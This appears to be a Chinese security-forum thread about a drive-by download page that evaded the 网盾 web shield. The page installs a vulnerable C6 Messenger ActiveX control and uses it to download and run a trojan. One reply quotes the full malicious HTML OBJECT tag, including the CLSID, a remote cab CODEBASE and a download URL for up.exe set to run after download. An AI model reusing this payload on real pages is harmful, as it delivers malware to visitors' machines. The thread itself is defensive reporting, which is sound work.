过了网盾...

fido_lee

在我看来，这是种较为少见和新颖的挂马方式。不同于一般网马直接利用本地存在漏洞的组件，其会主动下载并安装一款名为C6 Messenger的即时聊天工具中存在漏洞的ActiveX控件，并利用其漏洞下载恶意程序并调用运行。

整个页面的代码没有经过任何变形和加密，全部都是明码。在我见过的两次中，甚至连CLSID都没有换过～就这样，眼睁睁的看着它过了网盾，并运行了其下载的UP.exe。证据就是，注册表中出现了被下载组件相关的CLSID项，并且在系统中出现了UP.exe释放的Ma0Ya0.exe以及存在于active setup下的启动项。





当然，网盾是通过钩子ShellExecuteExW函数来达到监控恶意程序运行的。显然这种方式的利用没有用到这个函数，而是通过控件本身的相关函数调用执行了，所以一再错过了网盾的监视～

发这个贴的意思没有别的，希望金山尽快处理，从而更好的保障我们用户的安全。

PS：倒是那个“鼠镖”会有点儿提示，但作用微乎其微，如同嚼蜡～

nanhezzb

楼主您好，please tell me "其会主动下载并安装一款名为C6 Messenger的即时聊天工具"，咋执行下载安装呢？没借助本已经存在漏洞？

fido_lee

如有兴趣，可研究最后一张图中的URL。

直接贴代码怕一些防火墙报。

nanhezzb

回复 3# fido_lee


    我就是想问问，他不借助漏洞咋安装有漏洞的插件。刚才百度下CLSID相关信息如下
当使用IE访问这个URL的话，就会提示用户安装DownloaderActiveX控件 （CLSID：c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61）。

tanlimo

这里有谈到这个漏洞，2008年的东东.....

http://hi.baidu.com/vipver/blog/ ... ef4546ac4b5f58.html

代码

1. </html></script></body><BODY><OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="hxxp://www.qqwg.tk/up/DownloaderActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="hxxp://www.qqwg.tk/up/up.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>

复制代码

先通过安装ActiveX的方式下载安装存在漏洞的C6 Messenger控件然后触发这个控件的漏洞下载执行MMM.qqwg.tk/up/up.exe，其实浏览器本身就可以拦截了。

nanhezzb

感谢楼上网友，刚才自己一百度下，这个需要用户安装才之后才会让电脑存在这个漏洞吧？如果不安装下面的木马exe会下载运行吗？

haoge868

很好奇

中邪

网盾，已经放弃的说~
不过，关注了
挂马，大多数小心点就可以，习惯胜于主防！
不过我还是靠着AVG Web Shield在枪林弹雨中穿梭~

insight

显然楼主这个结论是不成立的

i_am_god

来支持网盾的说。希望网盾能越来越成熟。